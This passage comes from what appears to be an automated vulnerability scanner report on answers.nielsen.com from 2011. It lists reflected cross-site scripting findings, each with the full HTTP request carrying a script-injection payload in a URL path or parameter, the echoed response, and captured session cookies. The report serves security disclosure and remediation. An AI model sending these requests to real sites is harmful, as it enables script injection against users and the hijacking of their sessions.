The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7121b"><script>alert(1)</script>ac97cbfab60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /7121b"><script>alert(1)</script>ac97cbfab60/authValidation.htm HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: http://www.nielsen.com/us/en/client-login.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; answers_cookie=R907182360; USER_EMAIL_REJECT=Client ID

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:14 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/7121b"><script>alert(1)</script>ac97cbfab60/authValidation.htm">
...[SNIP]...

1.11. https://answers.nielsen.com/gateway/forgottenPassword.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/forgottenPassword.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cce9c"><script>alert(1)</script>3d85259268 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cce9c"><script>alert(1)</script>3d85259268/forgottenPassword.htm;GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:36 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16186


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/cce9c"><script>alert(1)</script>3d85259268/forgottenPassword.htm;GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667">
...[SNIP]...

1.12. https://answers.nielsen.com/gateway/forms/login.fcc [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/forms/login.fcc

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc7af"><script>alert(1)</script>072afaba004641f76 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /gateway/forms/login.fcc?realm=null&target=https%3A%2F%2Fanswers.nielsen.com%2Fportal%2Fsite%2Fanswersdc7af"><script>alert(1)</script>072afaba004641f76&SMAUTHREASON=null&password=+&USER=&PASSWORD= HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Cache-Control: max-age=0
Origin: https://answers.nielsen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:00 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16412


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answersdc7af"><script>alert(1)</script>072afaba004641f76">
...[SNIP]...

1.13. https://answers.nielsen.com/gateway/logon.htm [REALMOID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The value of the REALMOID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac238"><script>alert(1)</script>617d09a597d was submitted in the REALMOID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4ac238"><script>alert(1)</script>617d09a597d&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:59 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4ac238"><script>alert(1)</script>617d09a597d">
...[SNIP]...

1.14. https://answers.nielsen.com/gateway/logon.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed1"><script>alert(1)</script>2075966925a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b0ed1"><script>alert(1)</script>2075966925a/logon.htm HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:45 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16096


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/b0ed1"><script>alert(1)</script>2075966925a/logon.htm">
...[SNIP]...

1.15. https://answers.nielsen.com/gateway/logon.htm [SMAUTHREASON parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The value of the SMAUTHREASON request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f18a"><script>alert(1)</script>98611b0b153 was submitted in the SMAUTHREASON parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=07f18a"><script>alert(1)</script>98611b0b153&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:03 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="SMAUTHREASON" value="07f18a"><script>alert(1)</script>98611b0b153">
...[SNIP]...

1.16. https://answers.nielsen.com/gateway/logon.htm [TARGET parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/logon.htm

Issue detail

The value of the TARGET request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d477"><script>alert(1)</script>d009570e27c was submitted in the TARGET parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers2d477"><script>alert(1)</script>d009570e27c HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Referer: https://answers.nielsen.com/gateway/logon.htm;GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:06 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16406


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answers2d477"><script>alert(1)</script>d009570e27c">
...[SNIP]...

1.17. https://answers.nielsen.com/gateway/support/support.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/support/support.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d61f9"><script>alert(1)</script>96a46c075b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /d61f9"><script>alert(1)</script>96a46c075b0/support/support.jsp HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:29:48 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16106


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/d61f9"><script>alert(1)</script>96a46c075b0/support/support.jsp">
...[SNIP]...

1.18. https://answers.nielsen.com/portal/site/answers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c32"><script>alert(1)</script>8cf14dc6415 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /portal42c32"><script>alert(1)</script>8cf14dc6415/site/answers HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:20 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/portal42c32"><script>alert(1)</script>8cf14dc6415/site/answers">
...[SNIP]...

1.19. https://answers.nielsen.com/portal/site/answers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274ab"><script>alert(1)</script>4a2d92bb133 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /portal/site274ab"><script>alert(1)</script>4a2d92bb133/answers HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:27 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/portal/site274ab"><script>alert(1)</script>4a2d92bb133/answers">
...[SNIP]...

1.20. https://answers.nielsen.com/portal/site/answers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f96"><script>alert(1)</script>675c8958331 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /portal/site/answers27f96"><script>alert(1)</script>675c8958331 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:29:06 GMT
Date: Fri, 29 Apr 2011 17:30:34 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answers27f96"><script>alert(1)</script>675c8958331">
...[SNIP]...

1.21. https://answers.nielsen.com/portal/site/answers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /portal/site/answers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bbfc"><script>alert(1)</script>1b581a4e03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /portal/site/answers?7bbfc"><script>alert(1)</script>1b581a4e03b=1 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:05:38 GMT
Date: Fri, 29 Apr 2011 17:28:27 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16108


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="HTTPS://answers.nielsen.com/portal/site/answers?7bbfc"><script>alert(1)</script>1b581a4e03b=1">
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 18 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://answers.nielsen.com/gateway/authValidation.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://answers.nielsen.com
Path:   /gateway/authValidation.htm

Issue detail

